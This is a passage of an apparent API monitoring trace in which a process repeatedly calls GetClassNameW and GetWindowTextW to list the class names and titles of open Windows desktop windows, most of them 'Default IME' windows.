hWnd=0x10118, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0130.934] GetWindowTextW (in: hWnd=0x20152, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.019] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.019] GetWindowTextW (in: hWnd=0x1019a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.019] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.019] GetWindowTextW (in: hWnd=0x10116, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.020] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0131.020] GetWindowTextW (in: hWnd=0x1010e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.020] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0131.020] GetWindowTextW (in: hWnd=0x100f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.020] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.020] GetWindowTextW (in: hWnd=0x100f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Push Notifications Platform") returned 35 [0131.021] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0131.021] GetWindowTextW (in: hWnd=0x100ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0131.021] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0131.021] GetWindowTextW (in: hWnd=0x100ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.021] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0131.021] GetWindowTextW (in: hWnd=0x100e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.021] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.022] GetWindowTextW (in: hWnd=0x100e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.022] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.022] GetWindowTextW (in: hWnd=0x200da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.022] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.022] GetWindowTextW (in: hWnd=0x100c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.022] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0131.022] GetWindowTextW (in: hWnd=0x702b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.023] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0131.023] GetWindowTextW (in: hWnd=0x20040, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MS_WebcheckMonitor") returned 18 [0131.023] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0131.023] GetWindowTextW (in: hWnd=0x2001c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="BluetoothNotificationAreaIconWindowClass") returned 40 [0131.023] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0131.023] GetWindowTextW (in: hWnd=0x20030, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Windows Shell Experience Host") returned 29 [0131.023] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0131.024] GetWindowTextW (in: hWnd=0x2002e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.024] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0131.024] GetWindowTextW (in: hWnd=0x40038, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.024] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.024] GetWindowTextW (in: hWnd=0x101cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.024] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.025] GetWindowTextW (in: hWnd=0x101c8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.025] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0131.025] GetWindowTextW (in: hWnd=0x100ac, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.025] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0131.025] GetWindowTextW (in: hWnd=0x10078, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.025] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0131.025] GetWindowTextW (in: hWnd=0x10074, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.026] GetClassNameW (in: hWnd=0x10074, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0131.026] GetWindowTextW (in: hWnd=0x10022, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DWM Notification Window") returned 23 [0131.026] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0131.026] GetWindowTextW (in: hWnd=0x2002a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.026] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0131.026] GetWindowTextW (in: hWnd=0x3035e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0131.026] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0131.027] GetWindowTextW (in: hWnd=0x100d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Program Manager") returned 15 [0131.027] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0131.027] GetWindowTextW (in: hWnd=0x1012a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.027] GetClassNameW (in: hWnd=0x1012a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.027] GetWindowTextW (in: hWnd=0x100ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0131.027] GetClassNameW (in: hWnd=0x100ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0131.028] GetWindowTextW (in: hWnd=0x10082, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.028] GetClassNameW (in: hWnd=0x10082, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.028] GetWindowTextW (in: hWnd=0xb031c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.028] GetClassNameW (in: hWnd=0xb031c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.028] GetWindowTextW (in: hWnd=0x601d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.028] GetClassNameW (in: hWnd=0x601d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.029] GetWindowTextW (in: hWnd=0x103a0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.029] GetClassNameW (in: hWnd=0x103a0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.029] GetWindowTextW (in: hWnd=0x1039e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.029] GetClassNameW (in: hWnd=0x1039e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.029] GetWindowTextW (in: hWnd=0x1039c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.029] GetClassNameW (in: hWnd=0x1039c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.030] GetWindowTextW (in: hWnd=0x1039a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.030] GetClassNameW (in: hWnd=0x1039a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.030] GetWindowTextW (in: hWnd=0x20224, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.030] GetClassNameW (in: hWnd=0x20224, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.030] GetWindowTextW (in: hWnd=0x10398, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.030] GetClassNameW (in: hWnd=0x10398, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.030] GetWindowTextW (in: hWnd=0x10394, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.031] GetClassNameW (in: hWnd=0x10394, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.031] GetWindowTextW (in: hWnd=0x10392, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.031] GetClassNameW (in: hWnd=0x10392, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.031] GetWindowTextW (in: hWnd=0x10390, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.031] GetClassNameW (in: hWnd=0x10390, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.031] GetWindowTextW (in: hWnd=0x10388, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.031] GetClassNameW (in: hWnd=0x10388, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.032] GetWindowTextW (in: hWnd=0x10386, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.032] GetClassNameW (in: hWnd=0x10386, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.032] GetWindowTextW (in: hWnd=0x10384, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.032] GetClassNameW (in: hWnd=0x10384, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.032] GetWindowTextW (in: hWnd=0x10382, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.032] GetClassNameW (in: hWnd=0x10382, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.033] GetWindowTextW (in: hWnd=0x2021a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.036] GetClassNameW (in: hWnd=0x2021a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.036] GetWindowTextW (in: hWnd=0x10380, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.036] GetClassNameW (in: hWnd=0x10380, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.036] GetWindowTextW (in: hWnd=0x1037e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.037] GetClassNameW (in: hWnd=0x1037e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.037] GetWindowTextW (in: hWnd=0x1037c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.037] GetClassNameW (in: hWnd=0x1037c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.037] GetWindowTextW (in: hWnd=0x1037a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.037] GetClassNameW (in: hWnd=0x1037a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.037] GetWindowTextW (in: hWnd=0x10378, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.038] GetClassNameW (in: hWnd=0x10378, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.038] GetWindowTextW (in: hWnd=0x10376, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.038] GetClassNameW (in: hWnd=0x10376, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.038] GetWindowTextW (in: hWnd=0x10374, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.038] GetClassNameW (in: hWnd=0x10374, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.038] GetWindowTextW (in: hWnd=0x10372, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.038] GetClassNameW (in: hWnd=0x10372, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.039] GetWindowTextW (in: hWnd=0x10370, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.039] GetClassNameW (in: hWnd=0x10370, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.039] GetWindowTextW (in: hWnd=0x1036e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.039] GetClassNameW (in: hWnd=0x1036e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.039] GetWindowTextW (in: hWnd=0x1036c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.039] GetClassNameW (in: hWnd=0x1036c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.040] GetWindowTextW (in: hWnd=0x10368, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.040] GetClassNameW (in: hWnd=0x10368, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.040] GetWindowTextW (in: hWnd=0x10362, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.040] GetClassNameW (in: hWnd=0x10362, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.040] GetWindowTextW (in: hWnd=0x10360, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.040] GetClassNameW (in: hWnd=0x10360, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.041] GetWindowTextW (in: hWnd=0x1035a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.041] GetClassNameW (in: hWnd=0x1035a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.041] GetWindowTextW (in: hWnd=0x10358, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.041] GetClassNameW (in: hWnd=0x10358, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.041] GetWindowTextW (in: hWnd=0x10356, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.041] GetClassNameW (in: hWnd=0x10356, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.041] GetWindowTextW (in: hWnd=0x10354, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.042] GetClassNameW (in: hWnd=0x10354, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.042] GetWindowTextW (in: hWnd=0x10352, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.042] GetClassNameW (in: hWnd=0x10352, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.042] GetWindowTextW (in: hWnd=0x10350, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.042] GetClassNameW (in: hWnd=0x10350, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.042] GetWindowTextW (in: hWnd=0x1034e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.043] GetClassNameW (in: hWnd=0x1034e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.043] GetWindowTextW (in: hWnd=0x1034c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.043] GetClassNameW (in: hWnd=0x1034c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.043] GetWindowTextW (in: hWnd=0x1034a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.043] GetClassNameW (in: hWnd=0x1034a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.043] GetWindowTextW (in: hWnd=0x10348, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.043] GetClassNameW (in: hWnd=0x10348, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.044] GetWindowTextW (in: hWnd=0x10346, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.044] GetClassNameW (in: hWnd=0x10346, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.044] GetWindowTextW (in: hWnd=0x20216, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.044] GetClassNameW (in: hWnd=0x20216, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.044] GetWindowTextW (in: hWnd=0x1033c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.044] GetClassNameW (in: hWnd=0x1033c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.044] GetWindowTextW (in: hWnd=0x10334, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.044] GetClassNameW (in: hWnd=0x10334, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.045] GetWindowTextW (in: hWnd=0x10326, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.045] GetClassNameW (in: hWnd=0x10326, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.045] GetWindowTextW (in: hWnd=0x1030e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.045] GetClassNameW (in: hWnd=0x1030e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.045] GetWindowTextW (in: hWnd=0x1030c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.045] GetClassNameW (in: hWnd=0x1030c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.046] GetWindowTextW (in: hWnd=0x1030a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.046] GetClassNameW (in: hWnd=0x1030a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.046] GetWindowTextW (in: hWnd=0x10312, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.046] GetClassNameW (in: hWnd=0x10312, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.046] GetWindowTextW (in: hWnd=0x20208, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.046] GetClassNameW (in: hWnd=0x20208, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.046] GetWindowTextW (in: hWnd=0x1027a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.047] GetClassNameW (in: hWnd=0x1027a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.047] GetWindowTextW (in: hWnd=0x10278, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.047] GetClassNameW (in: hWnd=0x10278, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.048] GetWindowTextW (in: hWnd=0x10276, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.048] GetClassNameW (in: hWnd=0x10276, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.048] GetWindowTextW (in: hWnd=0x10274, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.048] GetClassNameW (in: hWnd=0x10274, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.048] GetWindowTextW (in: hWnd=0x20202, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.048] GetClassNameW (in: hWnd=0x20202, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.048] GetWindowTextW (in: hWnd=0x10272, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.049] GetClassNameW (in: hWnd=0x10272, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.049] GetWindowTextW (in: hWnd=0x10270, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.049] GetClassNameW (in: hWnd=0x10270, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.049] GetWindowTextW (in: hWnd=0x1026e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.049] GetClassNameW (in: hWnd=0x1026e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.050] GetWindowTextW (in: hWnd=0x1025e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.050] GetClassNameW (in: hWnd=0x1025e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.050] GetWindowTextW (in: hWnd=0x10250, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.050] GetClassNameW (in: hWnd=0x10250, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.050] GetWindowTextW (in: hWnd=0x1024a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.050] GetClassNameW (in: hWnd=0x1024a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.050] GetWindowTextW (in: hWnd=0x10248, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.050] GetClassNameW (in: hWnd=0x10248, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.051] GetWindowTextW (in: hWnd=0x10246, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.051] GetClassNameW (in: hWnd=0x10246, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.051] GetWindowTextW (in: hWnd=0x10238, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.051] GetClassNameW (in: hWnd=0x10238, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.051] GetWindowTextW (in: hWnd=0x10228, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.051] GetClassNameW (in: hWnd=0x10228, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.051] GetWindowTextW (in: hWnd=0x10220, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.051] GetClassNameW (in: hWnd=0x10220, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.052] GetWindowTextW (in: hWnd=0x1021c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.052] GetClassNameW (in: hWnd=0x1021c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.052] GetWindowTextW (in: hWnd=0x10212, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.052] GetClassNameW (in: hWnd=0x10212, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.052] GetWindowTextW (in: hWnd=0x10210, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.052] GetClassNameW (in: hWnd=0x10210, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.052] GetWindowTextW (in: hWnd=0x40194, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.052] GetClassNameW (in: hWnd=0x40194, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.052] GetWindowTextW (in: hWnd=0x101c0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.053] GetClassNameW (in: hWnd=0x101c0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.053] GetWindowTextW (in: hWnd=0x101a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.053] GetClassNameW (in: hWnd=0x101a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.053] GetWindowTextW (in: hWnd=0x10190, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.053] GetClassNameW (in: hWnd=0x10190, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.053] GetWindowTextW (in: hWnd=0x100f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="MSCTFIME UI") returned 11 [0131.053] GetClassNameW (in: hWnd=0x100f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="MSCTFIME UI") returned 11 [0131.053] GetWindowTextW (in: hWnd=0x100f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.054] GetClassNameW (in: hWnd=0x100f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.054] GetWindowTextW (in: hWnd=0x100e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.054] GetClassNameW (in: hWnd=0x100e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.054] GetWindowTextW (in: hWnd=0x100dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.054] GetClassNameW (in: hWnd=0x100dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.054] GetWindowTextW (in: hWnd=0x401ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.054] GetClassNameW (in: hWnd=0x401ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.054] GetWindowTextW (in: hWnd=0x2003c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.068] GetClassNameW (in: hWnd=0x2003c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.068] GetWindowTextW (in: hWnd=0x101ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0131.068] GetClassNameW (in: hWnd=0x101ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0131.068] GetWindowTextW (in: 